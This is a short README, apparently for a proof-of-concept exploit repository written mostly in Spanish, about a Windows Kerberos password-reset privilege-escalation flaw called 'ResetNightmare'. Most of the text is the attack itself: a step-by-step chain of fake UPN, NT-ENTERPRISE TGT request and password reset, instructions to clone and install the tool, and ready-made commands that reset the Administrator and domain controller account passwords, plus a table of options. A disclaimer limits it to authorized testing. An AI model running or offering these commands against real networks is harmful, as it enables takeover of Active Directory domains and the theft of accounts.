
PoC para CVE-2026-27912 - Windows Kerberos Elevation of Privilege (ResetNightmare). Restablecimiento de contraseña no autorizado mediante una falla de Kerberos. Solo para investigación de seguridad.
CVE-2026-27912 - Vulnerabilidad de elevación de privilegios de Windows Kerberos
ResetNightmare - Restablecimiento de contraseña no autorizado mediante una falla en el protocolo de cambio de contraseña de Kerberos.
| Campo | Valor |
|---|---|
| CVE | CVE-2026-27912 |
| Título | Vulnerabilidad de elevación de privilegios de Windows Kerberos |
| CVSS | 8.0 ALTA (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285: Autorización inadecuada |
| Publicado | 14 de abril de 2026 |
| Corregido | Abril de 2026 |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
Solo para pruebas de seguridad autorizadas e investigación educativa.
El acceso no autorizado a los sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso de este software.
n0vax1337 / Investigador de Seguridad
Licencia MIT - ver LICENSE
Última actualización: 2026
| Flag | Descripción | Por defecto |
|---|
-t / --target | Nombre de la cuenta objetivo | requerido |
-p / --new-password | Nueva contraseña para la cuenta objetivo | requerido |
-u / --upn-user | Cuenta en la que se establecerá un UPN falso | requerido |
-up / --upn-password | Contraseña para la cuenta UPN | requerido |
-c / --computer | UPNUser es una cuenta de equipo | flag |
-r / --rubeus-path | Ruta a Rubeus.exe | Rubeus.exe |
-e / --encryption | Tipo de cifrado admitido | AES256 |
-path / --create-path | Ruta OU para crear la nueva cuenta | "" |
-d / --dc | Nombre del controlador de dominio | detección automática |
-v / --verbose | Salida detallada | flag |